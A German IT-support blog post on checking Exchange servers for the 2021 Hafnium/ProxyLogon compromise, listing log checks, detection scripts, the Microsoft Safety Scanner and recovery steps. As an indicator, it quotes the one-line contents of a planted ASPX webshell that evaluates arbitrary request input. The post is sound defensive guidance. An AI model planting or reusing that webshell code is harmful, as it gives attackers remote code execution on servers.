Hafnium - Exchange Server - Angriff: Erfahrungen bei der Eingrenzung

Erfahrungen bei der Eingrenzung des Hafnium-Exchange-Angriffs

Alle | Posted by SYMPLASSON | 08 März 2021
Hafnium - Exchange Server - Angriff: Erfahrungen bei der Eingrenzung

Schritt 1

Analyse, ob der Mailserver vom Angriff betroffen ist. Mit Hilfe des Skripts test-proxylogon.ps1 können die Exchange Logs grundsätzlich auf verdächtige Aktivitäten durchsucht werden. (Wir haben in Bezug auf Veeam und Kaspersky allerdings auch False Positives gefunden, also z.B. eine Veeam.zip die tatsächlich unkritisch ist.) 

Etwas passiert ist, wenn...
  • sich in den Ergebnissen des Skripts Aufrufe auf die Pfade „/rpc“ oder /ecp/DDI/DDIService.svc/SetObject finden ( es wurde von den Angreifern mindestens auf die Schwachstelle geprüft).
  • sich im IIS (C:\inetpub\wwwroot\aspnet_client) ASPX-Dateien befinden, die dort nicht hingehören, z.B. eine Datei supp0rt.aspx. Inhaltlich findet man in dieser Datei Einträge wie: "ExternalUrl. http://f/<script language="JScript" runat="server">function Page_Load(){​​​​​​​​eval(Request["XOrSeMr3kgWUdFf6"],"unsafe");}​​​​​​​​</script>"
  • Verzeichnisberechtigungen auf die Ordner C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\ecp\auth sowie C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\15.x nicht mehr mit den Rechten des übergeordneten Ordners übereinstimmen. (In diesem Fall kann man den Besitz auf den Ordner übernehmen und anschließend Rechte und Besitzer neu vererben. Diese geänderten Rechte können auch dazu führen, dass sich Exchange Updates nicht installieren lassen).
  • sich im Auditlog dubiose, nicht zuzuordnende Einträge finden. Um das zu prüfen raten wir zur Nutzung der ExchangeReports von Frankysweb. (Hier wird auch ein Auditlog erstellt neben anderen nützlichen Infos, die automatisiert per Mail versandt werden können)
Nicht alles davon muss unbedingt durch einen Angriff ausgelöst werden, dennoch könnte es passieren, dass nach vier von vier Treffern der Nachtschlaf gestört wird. Was können wir also für einen angenehmen Nachtschlaf tun?

Schritt 2

Weitere Prüfung, falls im ersten Schritt etwas festgestellt wurde.
  1. Das Cert Lettland hat ein Skript veröffentlicht, mit dem man prüfen kann, ob eine Webshell erstellt wurde. https://github.com/cert-lv/exchange_webshell_detection/blob/main/detect_webshells.ps1
  2. Microsoft hat seinen Safety Scanner erweitert. Mit diesen lässt sich jetzt auch eine Komprimittierung des Exchange überprüfen. Mit dem Parameter /N bringt man dem Scanner bei, nichts zu löschen und nur ein Log zu schreiben. Zur Erkennung ist ein vollständiger Scan ratsam. Allerdings kann dieser die Auslastung der CPU auf 100% bringen! Am Ende gibt es unter %SYSTEMROOT%\debug\msert.log ein entsprechendes Logfile.

Schritt 3

Überlegen, wie es jetzt weitergeht. Hat man bei einem oder beiden der letzten Punkten einen (oder mehrere Treffer) kann man davon ausgehen, dass der Exchange kompromittiert wurde. Das dürfte der Punkt sein, an man sich mit der „Exchange Recovery Installation“ auseinander setzen darf.
Andernfalls dürfte der Nachtschlaf erst einmal weniger gestört sein. Grundsätzlich sollte man aber wohl die Tage einmal mehr einen Blick in die Logs werfen.

Wir drücken Ihnen die Daumen, dass Sie nicht betroffen sind!
Viele Grüße von Ihrem
SYMPLASSON Support-Team.

Quellen: